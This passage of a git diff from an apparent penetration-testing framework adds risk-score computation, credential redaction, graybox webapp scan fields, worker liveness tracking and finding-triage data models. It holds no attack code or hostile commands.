probe_data in probes.items(): + if not isinstance(probe_data, dict): + continue + for finding in probe_data.get("findings", []): + if not isinstance(finding, dict): + continue + evidence = finding.get("evidence", []) + if isinstance(evidence, list): + finding["evidence"] = [ + _redact_graybox_text(e) + for e in evidence + ] + artifacts = finding.get("evidence_artifacts", []) + if isinstance(artifacts, list): + finding["evidence_artifacts"] = [ + { 
+ **artifact, + "summary": _redact_graybox_text(artifact.get("summary", "")), + "request_snapshot": _redact_graybox_text(artifact.get("request_snapshot", "")), + "response_snapshot": _redact_graybox_text(artifact.get("response_snapshot", "")), + } + if isinstance(artifact, dict) else artifact + for artifact in artifacts + ] + artifacts = probe_data.get("artifacts", []) + if isinstance(artifacts, list): + probe_data["artifacts"] = [ + { + **artifact, + "summary": _redact_graybox_text(artifact.get("summary", "")), + "request_snapshot": _redact_graybox_text(artifact.get("request_snapshot", "")), + "response_snapshot": _redact_graybox_text(artifact.get("response_snapshot", "")), + } + if isinstance(artifact, dict) else artifact + for artifact in artifacts + ] + return redacted + + @staticmethod + def _redact_job_config(config_dict): + """ + Redact credential fields from a job config dict before persistence. + + Parameters + ---------- + config_dict : dict + JobConfig.to_dict() output. + + Returns + ------- + dict + Copy with official_password, regular_password, and weak_candidates masked. + """ + redacted = dict(config_dict) + if redacted.get("official_password"): + redacted["official_password"] = "***" + if redacted.get("regular_password"): + redacted["regular_password"] = "***" + if redacted.get("weak_candidates"): + redacted["weak_candidates"] = ["***"] * len(redacted["weak_candidates"]) + redacted.pop("secret_ref", None) + return redacted + + def _compute_ui_aggregate(self, passes, latest_aggregated, job_config=None): + """Compute pre-aggregated view for frontend from pass reports. + + Parameters + ---------- + passes : list + List of pass report dicts (PassReport.to_dict()). + latest_aggregated : dict + AggregatedScanData dict for the latest pass. 
+ + Returns + ------- + UiAggregate + """ + from collections import Counter + + latest = passes[-1] + agg = latest_aggregated + findings = latest.get("findings", []) or [] + scan_type = (job_config or {}).get("scan_type", "network") + graybox_stats = { + "total_routes_discovered": 0, + "total_forms_discovered": 0, + "total_scenarios": 0, + "total_scenarios_vulnerable": 0, + } + if scan_type == "webapp": + graybox_stats = self._extract_graybox_ui_stats(agg, latest) + + # Severity breakdown + findings_count = dict(Counter(f.get("severity", "INFO") for f in findings)) + + # Top findings: CRITICAL + HIGH, sorted by severity then confidence, capped at 10 + crit_high = [f for f in findings if f.get("severity") in ("CRITICAL", "HIGH")] + crit_high.sort(key=lambda f: ( + self.SEVERITY_ORDER.get(f.get("severity"), 9), + self.CONFIDENCE_ORDER.get(f.get("confidence"), 9), + )) + top_findings = crit_high[:10] + + # Finding timeline: track persistence across passes (continuous monitoring) + finding_timeline = {} + for p in passes: + pass_nr = p.get("pass_nr", 0) + for f in (p.get("findings") or []): + fid = f.get("finding_id") + if not fid: + continue + if fid not in finding_timeline: + finding_timeline[fid] = {"first_seen": pass_nr, "last_seen": pass_nr, "pass_count": 1} + else: + finding_timeline[fid]["last_seen"] = pass_nr + finding_timeline[fid]["pass_count"] += 1 + + return UiAggregate( + total_open_ports=sorted(set(agg.get("open_ports", []))), + total_services=self._count_services(agg.get("service_info", {})), + total_findings=len(findings), + findings_count=findings_count if findings_count else None, + top_findings=top_findings if top_findings else None, + finding_timeline=finding_timeline if finding_timeline else None, + latest_risk_score=latest.get("risk_score"), + latest_risk_breakdown=latest.get("risk_breakdown"), + latest_quick_summary=latest.get("quick_summary"), + worker_activity=[ + { + "id": addr, + "start_port": w["start_port"], + "end_port": w["end_port"], + 
"open_ports": w.get("open_ports", []), + } + for addr, w in (latest.get("worker_reports") or {}).items() + ] or None, + scan_type=scan_type, + total_routes_discovered=graybox_stats["total_routes_discovered"], + total_forms_discovered=graybox_stats["total_forms_discovered"], + total_scenarios=graybox_stats["total_scenarios"], + total_scenarios_vulnerable=graybox_stats["total_scenarios_vulnerable"], + ) diff --git a/extensions/business/cybersec/red_mesh/mixins/risk.py b/extensions/business/cybersec/red_mesh/mixins/risk.py new file mode 100644 index 00000000..630b8262 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/risk.py @@ -0,0 +1,361 @@ +""" +Risk scoring mixin for RedMesh pentester API. + +Pure computation — takes aggregated scan reports and produces risk scores +(0-100) with breakdowns and flat findings lists. No CStore or R1FS access. +""" + +from ..constants import ( + RISK_SEVERITY_WEIGHTS, + RISK_CONFIDENCE_MULTIPLIERS, + RISK_SIGMOID_K, + RISK_CRED_PENALTY_PER, + RISK_CRED_PENALTY_CAP, +) + + +class _RiskScoringMixin: + """Risk scoring and findings extraction methods for PentesterApi01Plugin.""" + + def _compute_risk_score(self, aggregated_report): + """ + Compute a 0-100 risk score from an aggregated scan report. + + The score combines four components: + A. Finding severity (weighted by confidence) + B. Open ports (diminishing returns) + C. Attack surface breadth (distinct protocols) + D. Default credentials penalty + + Parameters + ---------- + aggregated_report : dict + Aggregated report with service_info, web_tests_info, correlation_findings, + open_ports, and port_protocols. 
+ + Returns + ------- + dict + ``{"score": int, "breakdown": dict}`` + """ + import math + + findings_score = 0.0 + finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} + cred_count = 0 + + def process_findings(findings_list): + nonlocal findings_score, cred_count + for finding in findings_list: + if not isinstance(finding, dict): + continue + severity = finding.get("severity", "INFO").upper() + confidence = finding.get("confidence", "firm").lower() + weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) + multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) + findings_score += weight * multiplier + if severity in finding_counts: + finding_counts[severity] += 1 + title = finding.get("title", "") + if isinstance(title, str) and "default credential accepted" in title.lower(): + cred_count += 1 + + # A. Iterate service_info findings + service_info = aggregated_report.get("service_info", {}) + for port_key, probes in service_info.items(): + if not isinstance(probes, dict): + continue + for probe_name, probe_data in probes.items(): + if not isinstance(probe_data, dict): + continue + process_findings(probe_data.get("findings", [])) + + # A. Iterate web_tests_info findings + web_tests_info = aggregated_report.get("web_tests_info", {}) + for port_key, tests in web_tests_info.items(): + if not isinstance(tests, dict): + continue + for test_name, test_data in tests.items(): + if not isinstance(test_data, dict): + continue + process_findings(test_data.get("findings", [])) + + # A. Iterate correlation_findings + correlation_findings = aggregated_report.get("correlation_findings", []) + if isinstance(correlation_findings, list): + process_findings(correlation_findings) + + # A. 
Iterate graybox_results — uses GrayboxFinding.to_flat_finding() + from ..graybox.findings import GrayboxFinding as _GF + graybox_results = aggregated_report.get("graybox_results", {}) + for port_key, probes in graybox_results.items(): + if not isinstance(probes, dict): + continue + for probe_name, probe_data in probes.items(): + if not isinstance(probe_data, dict): + continue + for finding_dict in probe_data.get("findings", []): + if not isinstance(finding_dict, dict): + continue + try: + flat = _GF.flat_from_dict(finding_dict, 0, "unknown", probe_name) + except (TypeError, KeyError, ValueError): + continue + weight = RISK_SEVERITY_WEIGHTS.get(flat["severity"], 0) + multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(flat["confidence"], 0.5) + findings_score += weight * multiplier + if flat["severity"] in finding_counts: + finding_counts[flat["severity"]] += 1 + + # B. Open ports — diminishing returns: 15 × (1 - e^(-ports/8)) + open_ports = aggregated_report.get("open_ports", []) + nr_ports = len(open_ports) if isinstance(open_ports, list) else 0 + open_ports_score = 15.0 * (1.0 - math.exp(-nr_ports / 8.0)) + + # C. Attack surface breadth — distinct protocols: 10 × (1 - e^(-protocols/4)) + port_protocols = aggregated_report.get("port_protocols", {}) + nr_protocols = len(set(port_protocols.values())) if isinstance(port_protocols, dict) else 0 + breadth_score = 10.0 * (1.0 - math.exp(-nr_protocols / 4.0)) + + # D. 
Default credentials penalty + credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) + + # Raw total + raw_total = findings_score + open_ports_score + breadth_score + credentials_penalty + + # Normalize to 0-100 via logistic curve + score = int(round(100.0 * (2.0 / (1.0 + math.exp(-RISK_SIGMOID_K * raw_total)) - 1.0))) + score = max(0, min(100, score)) + + return { + "score": score, + "breakdown": { + "findings_score": round(findings_score, 1), + "open_ports_score": round(open_ports_score, 1), + "breadth_score": round(breadth_score, 1), + "credentials_penalty": credentials_penalty, + "raw_total": round(raw_total, 1), + "finding_counts": finding_counts, + }, + } + + def _compute_risk_and_findings(self, aggregated_report): + """ + Compute risk score AND extract flat findings in a single walk. + + Extends _compute_risk_score to also produce a flat list of enriched + findings from the nested service_info/web_tests_info/correlation structure. + + Parameters + ---------- + aggregated_report : dict + Aggregated report with service_info, web_tests_info, etc. + + Returns + ------- + tuple[dict, list] + (risk_result, flat_findings) where risk_result is {"score": int, "breakdown": dict} + and flat_findings is a list of enriched finding dicts. 
+ """ + import hashlib + import math + + findings_score = 0.0 + finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} + cred_count = 0 + flat_findings = [] + + port_protocols = aggregated_report.get("port_protocols") or {} + + def process_findings(findings_list, port, probe_name, category): + nonlocal findings_score, cred_count + for finding in findings_list: + if not isinstance(finding, dict): + continue + severity = finding.get("severity", "INFO").upper() + confidence = finding.get("confidence", "firm").lower() + weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) + multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) + findings_score += weight * multiplier + if severity in finding_counts: + finding_counts[severity] += 1 + title = finding.get("title", "") + if isinstance(title, str) and "default credential accepted" in title.lower(): + cred_count += 1 + + # Build deterministic finding_id + canon_title = (finding.get("title") or "").lower().strip() + cwe = finding.get("cwe_id", "") + id_input = f"{port}:{probe_name}:{cwe}:{canon_title}" + finding_id = hashlib.sha256(id_input.encode()).hexdigest()[:16] + + protocol = port_protocols.get(str(port), "unknown") + + flat_findings.append({ + "finding_id": finding_id, + **{k: v for k, v in finding.items()}, + "port": port, + "protocol": protocol, + "probe": probe_name, + "category": category, + }) + + def parse_port(port_key): + """Extract integer port from keys like '80/tcp' or '80'.""" + try: + return int(str(port_key).split("/")[0]) + except (ValueError, IndexError): + return 0 + + # Walk service_info + service_info = aggregated_report.get("service_info", {}) + for port_key, probes in service_info.items(): + if not isinstance(probes, dict): + continue + port = parse_port(port_key) + for probe_name, probe_data in probes.items(): + if not isinstance(probe_data, dict): + continue + process_findings(probe_data.get("findings", []), port, probe_name, "service") + + # Walk web_tests_info + 
web_tests_info = aggregated_report.get("web_tests_info", {}) + for port_key, tests in web_tests_info.items(): + if not isinstance(tests, dict): + continue + port = parse_port(port_key) + for test_name, test_data in tests.items(): + if not isinstance(test_data, dict): + continue + process_findings(test_data.get("findings", []), port, test_name, "web") + + # Walk correlation_findings + correlation_findings = aggregated_report.get("correlation_findings", []) + if isinstance(correlation_findings, list): + process_findings(correlation_findings, 0, "_correlation", "correlation") + + # Walk graybox_results — delegates to GrayboxFinding.to_flat_finding() + from ..graybox.findings import GrayboxFinding as _GF + graybox_results = aggregated_report.get("graybox_results", {}) + for port_key, probes in graybox_results.items(): + if not isinstance(probes, dict): + continue + port = parse_port(port_key) + protocol = port_protocols.get(str(port), "unknown") + for probe_name, probe_data in probes.items(): + if not isinstance(probe_data, dict): + continue + for finding_dict in probe_data.get("findings", []): + if not isinstance(finding_dict, dict): + continue + try: + flat = _GF.flat_from_dict(finding_dict, port, protocol, probe_name) + except (TypeError, KeyError, ValueError): + continue + + weight = RISK_SEVERITY_WEIGHTS.get(flat["severity"], 0) + multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(flat["confidence"], 0.5) + findings_score += weight * multiplier + if flat["severity"] in finding_counts: + finding_counts[flat["severity"]] += 1 + title = flat.get("title", "") + if isinstance(title, str) and "default credential accepted" in title.lower(): + cred_count += 1 + + flat_findings.append(flat) + + # B. Open ports — diminishing returns + open_ports = aggregated_report.get("open_ports", []) + nr_ports = len(open_ports) if isinstance(open_ports, list) else 0 + open_ports_score = 15.0 * (1.0 - math.exp(-nr_ports / 8.0)) + + # C. 
Attack surface breadth + nr_protocols = len(set(port_protocols.values())) if isinstance(port_protocols, dict) else 0 + breadth_score = 10.0 * (1.0 - math.exp(-nr_protocols / 4.0)) + + # D. Default credentials penalty + credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) + + # Deduplicate CVE findings: when the same CVE appears on the same port + # from different probes (behavioral + version-based), keep the higher + # confidence detection and drop the duplicate. + import re as _re_dedup + CONFIDENCE_RANK = {"certain": 3, "firm": 2, "tentative": 1} + cve_best = {} # (cve_id, port) -> index of best finding + drop_indices = set() + for idx, f in enumerate(flat_findings): + title = f.get("title", "") + m = _re_dedup.search(r"CVE-\d{4}-\d+", title) + if not m: + continue + cve_id = m.group(0) + port = f.get("port", 0) + key = (cve_id, port) + conf = CONFIDENCE_RANK.get(f.get("confidence", "tentative"), 0) + if key in cve_best: + prev_idx = cve_best[key] + prev_conf = CONFIDENCE_RANK.get(flat_findings[prev_idx].get("confidence", "tentative"), 0) + if conf > prev_conf: + drop_indices.add(prev_idx) + cve_best[key] = idx + else: + drop_indices.add(idx) + else: + cve_best[key] = idx + + if drop_indices: + flat_findings = [f for i, f in enumerate(flat_findings) if i not in drop_indices] + # Recalculate scores after dedup + findings_score = 0.0 + finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} + cred_count = 0 + for f in flat_findings: + severity = f.get("severity", "INFO").upper() + confidence = f.get("confidence", "firm").lower() + weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) + multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) + findings_score += weight * multiplier + if severity in finding_counts: + finding_counts[severity] += 1 + title = f.get("title", "") + if isinstance(title, str) and "default credential accepted" in title.lower(): + cred_count += 1 + credentials_penalty = min(cred_count * 
RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) + + raw_total = findings_score + open_ports_score + breadth_score + credentials_penalty + score = int(round(100.0 * (2.0 / (1.0 + math.exp(-RISK_SIGMOID_K * raw_total)) - 1.0))) + score = max(0, min(100, score)) + + risk_result = { + "score": score, + "breakdown": { + "findings_score": round(findings_score, 1), + "open_ports_score": round(open_ports_score, 1), + "breadth_score": round(breadth_score, 1), + "credentials_penalty": credentials_penalty, + "raw_total": round(raw_total, 1), + "finding_counts": finding_counts, + }, + } + return risk_result, flat_findings + + def _count_services(self, service_info): + """Count ports that have at least one identified service. + + Parameters + ---------- + service_info : dict + Port-keyed service info dict from aggregated scan data. + + Returns + ------- + int + Number of ports with detected services. + """ + if not isinstance(service_info, dict): + return 0 + count = 0 + for port_key, probes in service_info.items(): + if isinstance(probes, dict) and len(probes) > 0: + count += 1 + return count diff --git a/extensions/business/cybersec/red_mesh/models/__init__.py b/extensions/business/cybersec/red_mesh/models/__init__.py index 5e51335c..9e3754ac 100644 --- a/extensions/business/cybersec/red_mesh/models/__init__.py +++ b/extensions/business/cybersec/red_mesh/models/__init__.py @@ -47,6 +47,11 @@ UiAggregate, JobArchive, ) +from extensions.business.cybersec.red_mesh.models.triage import ( + FindingTriageAuditEntry, + FindingTriageState, + VALID_TRIAGE_STATUSES, +) __all__ = [ # shared @@ -70,4 +75,7 @@ "PassReport", "UiAggregate", "JobArchive", + "FindingTriageState", + "FindingTriageAuditEntry", + "VALID_TRIAGE_STATUSES", ] diff --git a/extensions/business/cybersec/red_mesh/models/archive.py b/extensions/business/cybersec/red_mesh/models/archive.py index 2aa77402..2df1196c 100644 --- a/extensions/business/cybersec/red_mesh/models/archive.py +++ 
b/extensions/business/cybersec/red_mesh/models/archive.py @@ -14,7 +14,7 @@ from extensions.business.cybersec.red_mesh.models.shared import _strip_none from extensions.business.cybersec.red_mesh.constants import ( - DISTRIBUTION_SLICE, PORT_ORDER_SEQUENTIAL, RUN_MODE_SINGLEPASS, + DISTRIBUTION_SLICE, PORT_ORDER_SEQUENTIAL, RUN_MODE_SINGLEPASS, JOB_ARCHIVE_VERSION, ) @@ -48,6 +48,28 @@ class JobConfig: created_by_name: str = "" created_by_id: str = "" authorized: bool = False + target_confirmation: str = "" + scope_id: str = "" + authorization_ref: str = "" + engagement_metadata: dict = None + target_allowlist: list = None + safety_policy: dict = None + # ── graybox fields ── + scan_type: str = "network" # "network" | "webapp" + target_url: str = "" # required when scan_type == "webapp" + secret_ref: str = "" # reference to separately persisted graybox secrets + has_regular_credentials: bool = False + has_weak_candidates: bool = False + official_username: str = "" + official_password: str = "" + regular_username: str = "" + regular_password: str = "" + weak_candidates: list = None # legacy inline payload; new launches use secret_ref + max_weak_attempts: int = 5 + app_routes: list = None # user-supplied known routes + verify_tls: bool = True # TLS cert verification + target_config: dict = None # GrayboxTargetConfig.to_dict() + allow_stateful_probes: bool = False # gate for A06 workflow probes def to_dict(self) -> dict: return _strip_none(asdict(self)) @@ -78,6 +100,27 @@ def from_dict(cls, d: dict) -> JobConfig: created_by_name=d.get("created_by_name", ""), created_by_id=d.get("created_by_id", ""), authorized=d.get("authorized", False), + target_confirmation=d.get("target_confirmation", ""), + scope_id=d.get("scope_id", ""), + authorization_ref=d.get("authorization_ref", ""), + engagement_metadata=d.get("engagement_metadata"), + target_allowlist=d.get("target_allowlist"), + safety_policy=d.get("safety_policy"), + scan_type=d.get("scan_type", "network"), + 
target_url=d.get("target_url", ""), + secret_ref=d.get("secret_ref", ""), + has_regular_credentials=d.get("has_regular_credentials", False), + has_weak_candidates=d.get("has_weak_candidates", False), + official_username=d.get("official_username", ""), + official_password=d.get("official_password", ""), + regular_username=d.get("regular_username", ""), + regular_password=d.get("regular_password", ""), + weak_candidates=d.get("weak_candidates"), + max_weak_attempts=d.get("max_weak_attempts", 5), + app_routes=d.get("app_routes"), + verify_tls=d.get("verify_tls", True), + target_config=d.get("target_config"), + allow_stateful_probes=d.get("allow_stateful_probes", False), ) @@ -198,6 +241,12 @@ class UiAggregate: top_findings: list = None # top 10 CRITICAL+HIGH findings for dashboard display finding_timeline: dict = None # { finding_id: { first_seen, last_seen, pass_count } } worker_activity: list = None # [ { id, start_port, end_port, open_ports } ] + # ── graybox-aware ── + scan_type: str = "network" + total_routes_discovered: int = 0 # webapp: discovered routes + total_forms_discovered: int = 0 # webapp: discovered forms + total_scenarios: int = 0 # webapp: probe scenarios run + total_scenarios_vulnerable: int = 0 # webapp: vulnerable count def to_dict(self) -> dict: return _strip_none(asdict(self)) @@ -215,6 +264,11 @@ def from_dict(cls, d: dict) -> UiAggregate: top_findings=d.get("top_findings"), finding_timeline=d.get("finding_timeline"), worker_activity=d.get("worker_activity"), + scan_type=d.get("scan_type", "network"), + total_routes_discovered=d.get("total_routes_discovered", 0), + total_forms_discovered=d.get("total_forms_discovered", 0), + total_scenarios=d.get("total_scenarios", 0), + total_scenarios_vulnerable=d.get("total_scenarios_vulnerable", 0), ) @@ -235,6 +289,7 @@ class JobArchive: duration: float date_created: float date_completed: float + archive_version: int = JOB_ARCHIVE_VERSION start_attestation: dict = None def to_dict(self) -> dict: @@ -242,7 
+297,13 @@ def to_dict(self) -> dict: @classmethod def from_dict(cls, d: dict) -> JobArchive: + archive_version = d.get("archive_version", JOB_ARCHIVE_VERSION) + if archive_version != JOB_ARCHIVE_VERSION: + raise ValueError( + f"Unsupported archive_version {archive_version}; expected {JOB_ARCHIVE_VERSION}" + ) return cls( + archive_version=archive_version, job_id=d["job_id"], job_config=d.get("job_config", {}), timeline=d.get("timeline", []), diff --git a/extensions/business/cybersec/red_mesh/models/cstore.py b/extensions/business/cybersec/red_mesh/models/cstore.py index fe17c87e..50df0d73 100644 --- a/extensions/business/cybersec/red_mesh/models/cstore.py +++ b/extensions/business/cybersec/red_mesh/models/cstore.py @@ -17,13 +17,27 @@ @dataclass(frozen=True) class CStoreWorker: - """Worker entry in CStore during job execution.""" + """ + Launcher-owned worker assignment state in CStore during job execution. + + Runtime liveness belongs in the separate ``:live`` namespace. The main job + record keeps durable orchestration metadata such as assignment revisions, + retry tracking, and final report references. 
+ """ start_port: int end_port: int finished: bool = False canceled: bool = False report_cid: str = None result: dict = None # fallback: inline report if R1FS is down + assignment_revision: int = 1 + assigned_at: float = None + reannounce_count: int = 0 + last_reannounce_at: float = None + retry_reason: str = None + terminal_reason: str = None + error: str = None + unreachable_at: float = None def to_dict(self) -> dict: return _strip_none(asdict(self)) @@ -37,6 +51,14 @@ def from_dict(cls, d: dict) -> CStoreWorker: canceled=d.get("canceled", False), report_cid=d.get("report_cid"), result=d.get("result"), + assignment_revision=d.get("assignment_revision", 1), + assigned_at=d.get("assigned_at"), + reannounce_count=d.get("reannounce_count", 0), + last_reannounce_at=d.get("last_reannounce_at"), + retry_reason=d.get("retry_reason"), + terminal_reason=d.get("terminal_reason"), + error=d.get("error"), + unreachable_at=d.get("unreachable_at"), ) @@ -74,6 +96,8 @@ class CStoreJobRunning: launcher: str launcher_alias: str target: str + scan_type: str + target_url: str task_name: str start_port: int end_port: int @@ -84,6 +108,7 @@ class CStoreJobRunning: pass_reports: list # [ PassReportRef.to_dict() ] next_pass_at: float = None risk_score: float = 0 + job_revision: int = 0 redmesh_job_start_attestation: dict = None last_attestation_at: float = None @@ -100,6 +125,8 @@ def from_dict(cls, d: dict) -> CStoreJobRunning: launcher=d["launcher"], launcher_alias=d.get("launcher_alias", ""), target=d["target"], + scan_type=d.get("scan_type", "network"), + target_url=d.get("target_url", ""), task_name=d.get("task_name", ""), start_port=d["start_port"], end_port=d["end_port"], @@ -110,6 +137,7 @@ def from_dict(cls, d: dict) -> CStoreJobRunning: pass_reports=d.get("pass_reports", []), next_pass_at=d.get("next_pass_at"), risk_score=d.get("risk_score", 0), + job_revision=d.get("job_revision", 0), redmesh_job_start_attestation=d.get("redmesh_job_start_attestation"), 
last_attestation_at=d.get("last_attestation_at"), ) @@ -126,6 +154,8 @@ class CStoreJobFinalized: job_id: str job_status: str # FINALIZED | STOPPED target: str + scan_type: str + target_url: str task_name: str risk_score: float run_mode: str @@ -150,6 +180,8 @@ def from_dict(cls, d: dict) -> CStoreJobFinalized: job_id=d["job_id"], job_status=d["job_status"], target=d["target"], + scan_type=d.get("scan_type", "network"), + target_url=d.get("target_url", ""), task_name=d.get("task_name", ""), risk_score=d.get("risk_score", 0), run_mode=d["run_mode"], @@ -173,11 +205,17 @@ class WorkerProgress: Ephemeral real-time progress published by each worker node. Stored in a separate CStore hset (hkey = f"{instance_id}:live", - key = f"{job_id}:{worker_addr}"). Cleaned up when the pass completes. + key = f"{job_id}:{worker_addr}"). Cleaned up opportunistically when the pass + completes, but reconciliation must remain correct even if stale rows linger. + + These records are worker-owned liveness truth. Launcher retry logic should + match them by ``job_id``, ``pass_nr``, ``worker_addr``, and + ``assignment_revision_seen``. 
""" job_id: str worker_addr: str pass_nr: int + assignment_revision_seen: int progress: float # 0.0 - 100.0 (stage-based: completed_stages/total * 100) phase: str # port_scan | fingerprint | service_probes | web_tests | correlation ports_scanned: int @@ -185,6 +223,15 @@ class WorkerProgress: open_ports_found: list # [int] — discovered so far completed_tests: list # [str] — which probes finished updated_at: float # unix timestamp + started_at: float = None + first_seen_live_at: float = None + last_seen_at: float = None + error: str = None + report_cid: str = None + scan_type: str = "network" # network | webapp + phase_index: int = 0 # 1-based current stage index; 0 when unknown + total_phases: int = 0 # number of stages in the active phase family + finished: bool = False live_metrics: dict = None # ScanMetrics.to_dict() — partial snapshot, progressively fills in threads: dict = None # {thread_id: {phase, ports_scanned, ports_total, open_ports_found}} @@ -197,13 +244,23 @@ def from_dict(cls, d: dict) -> WorkerProgress: job_id=d["job_id"], worker_addr=d["worker_addr"], pass_nr=d.get("pass_nr", 1), + assignment_revision_seen=d.get("assignment_revision_seen", 1), progress=d.get("progress", 0), phase=d.get("phase", ""), + started_at=d.get("started_at"), + first_seen_live_at=d.get("first_seen_live_at"), + last_seen_at=d.get("last_seen_at", d.get("updated_at", 0)), + error=d.get("error"), + report_cid=d.get("report_cid"), + scan_type=d.get("scan_type", "network"), + phase_index=d.get("phase_index", 0), + total_phases=d.get("total_phases", 0), ports_scanned=d.get("ports_scanned", 0), ports_total=d.get("ports_total", 0), open_ports_found=d.get("open_ports_found", []), completed_tests=d.get("completed_tests", []), updated_at=d.get("updated_at", 0), + finished=d.get("finished", False), live_metrics=d.get("live_metrics"), threads=d.get("threads"), ) diff --git a/extensions/business/cybersec/red_mesh/models/shared.py b/extensions/business/cybersec/red_mesh/models/shared.py 
index bc0e6d4e..b565e31f 100644 --- a/extensions/business/cybersec/red_mesh/models/shared.py +++ b/extensions/business/cybersec/red_mesh/models/shared.py @@ -124,6 +124,13 @@ class ScanMetrics: open_port_details: list = None # [ { "port": 22, "protocol": "ssh", "banner_confirmed": True }, ... ] banner_confirmation: dict = None # { "confirmed": 3, "guessed": 2 } + # ── Graybox scenario stats (webapp scans only) ── + scenarios_total: int = 0 + scenarios_vulnerable: int = 0 + scenarios_clean: int = 0 + scenarios_inconclusive: int = 0 + scenarios_error: int = 0 + def to_dict(self) -> dict: return _strip_none(asdict(self)) @@ -150,4 +157,9 @@ def from_dict(cls, d: dict) -> ScanMetrics: finding_distribution=d.get("finding_distribution"), open_port_details=d.get("open_port_details"), banner_confirmation=d.get("banner_confirmation"), + scenarios_total=d.get("scenarios_total", 0), + scenarios_vulnerable=d.get("scenarios_vulnerable", 0), + scenarios_clean=d.get("scenarios_clean", 0), + scenarios_inconclusive=d.get("scenarios_inconclusive", 0), + scenarios_error=d.get("scenarios_error", 0), ) diff --git a/extensions/business/cybersec/red_mesh/models/triage.py b/extensions/business/cybersec/red_mesh/models/triage.py new file mode 100644 index 00000000..ad137714 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/models/triage.py @@ -0,0 +1,70 @@ +from __future__ import annotations + +from dataclasses import dataclass, asdict + +from extensions.business.cybersec.red_mesh.models.shared import _strip_none + + +VALID_TRIAGE_STATUSES = frozenset({ + "open", + "accepted_risk", + "false_positive", + "remediated", + "reopened", +}) + + +@dataclass(frozen=True) +class FindingTriageState: + job_id: str + finding_id: str + status: str = "open" + note: str = "" + actor: str = "" + updated_at: float = 0.0 + review_at: float = None + + def to_dict(self) -> dict: + return _strip_none(asdict(self)) + + @classmethod + def from_dict(cls, d: dict) -> "FindingTriageState": + status = 
d.get("status", "open") + if status not in VALID_TRIAGE_STATUSES: + raise ValueError(f"Unsupported triage status: {status}") + return cls( + job_id=d["job_id"], + finding_id=d["finding_id"], + status=status, + note=d.get("note", ""), + actor=d.get("actor", ""), + updated_at=float(d.get("updated_at", 0.0) or 0.0), + review_at=d.get("review_at"), + ) + + +@dataclass(frozen=True) +class FindingTriageAuditEntry: + job_id: str + finding_id: str + status: str + note: str = "" + actor: str = "" + timestamp: float = 0.0 + + def to_dict(self) -> dict: + return _strip_none(asdict(self)) + + @classmethod + def from_dict(cls, d: dict) -> "FindingTriageAuditEntry": + status = d.get("status", "open") + if status not in VALID_TRIAGE_STATUSES: + raise ValueError(f"Unsupported triage status: {status}") + return cls( + job_id=d["job_id"], + finding_id=d["finding_id"], + status=status, + note=d.get("note", ""), + actor=d.get("actor", ""), + timestamp=float(d.get("timestamp", 0.0) or 0.0), + ) diff --git a/extensions/business/cybersec/red_mesh/pentester_api_01.py b/extensions/business/cybersec/red_mesh/pentester_api_01.py index c10c01fc..243903b2 100644 --- a/extensions/business/cybersec/red_mesh/pentester_api_01.py +++ b/extensions/business/cybersec/red_mesh/pentester_api_01.py @@ -30,20 +30,22 @@ """ -import ipaddress import random - -from urllib.parse import urlparse +from collections import deque from naeural_core.business.default.web_app.fast_api_web_app import FastApiWebAppPlugin as BasePlugin -from .pentest_worker import PentestLocalWorker -from .redmesh_llm_agent_mixin import _RedMeshLlmAgentMixin +from .mixins import ( + _RedMeshLlmAgentMixin, _AttestationMixin, _RiskScoringMixin, + _ReportMixin, _LiveProgressMixin, +) from .models import ( JobConfig, PassReport, PassReportRef, WorkerReportMeta, AggregatedScanData, - CStoreJobFinalized, UiAggregate, JobArchive, WorkerProgress, + CStoreJobFinalized, JobArchive, WorkerProgress, ) from .constants import ( FEATURE_CATALOG, + 
ScanType, + JOB_ARCHIVE_VERSION, JOB_STATUS_RUNNING, JOB_STATUS_COLLECTING, JOB_STATUS_ANALYZING, @@ -53,6 +55,7 @@ JOB_STATUS_FINALIZED, RUN_MODE_SINGLEPASS, RUN_MODE_CONTINUOUS_MONITORING, + MAX_CONTINUOUS_PASSES, DISTRIBUTION_SLICE, DISTRIBUTION_MIRROR, PORT_ORDER_SHUFFLE, @@ -60,35 +63,70 @@ LLM_ANALYSIS_SECURITY_ASSESSMENT, LLM_ANALYSIS_VULNERABILITY_SUMMARY, LLM_ANALYSIS_REMEDIATION_PLAN, - RISK_SEVERITY_WEIGHTS, - RISK_CONFIDENCE_MULTIPLIERS, - RISK_SIGMOID_K, - RISK_CRED_PENALTY_PER, - RISK_CRED_PENALTY_CAP, LOCAL_WORKERS_MIN, LOCAL_WORKERS_MAX, LOCAL_WORKERS_DEFAULT, - PROGRESS_PUBLISH_INTERVAL, PHASE_ORDER, + GRAYBOX_PHASE_ORDER, PHASE_MARKERS, ) +from .services import ( + announce_launch, + build_network_workers, + build_webapp_workers, + get_job_analysis, + coerce_scan_type, + get_job_archive, + get_job_triage, + get_job_data, + get_job_progress, + get_scan_strategy, + is_intermediate_job_status, + is_terminal_job_status, + iter_scan_strategies, + launch_local_jobs, + launch_network_scan, + launch_test, + launch_webapp_scan, + list_local_jobs, + list_network_jobs, + maybe_finalize_pass, + normalize_common_launch_options, + parse_exceptions, + purge_job, + get_llm_agent_config, + get_distributed_job_reconciliation_config, + reconcile_job_workers, + resolve_job_config_secrets, + resolve_active_peers, + resolve_enabled_features, + set_job_status, + stop_and_delete_job, + stop_monitoring, + update_finding_triage, + validation_error, +) +from .repositories import ArtifactRepository, JobStateRepository + +# 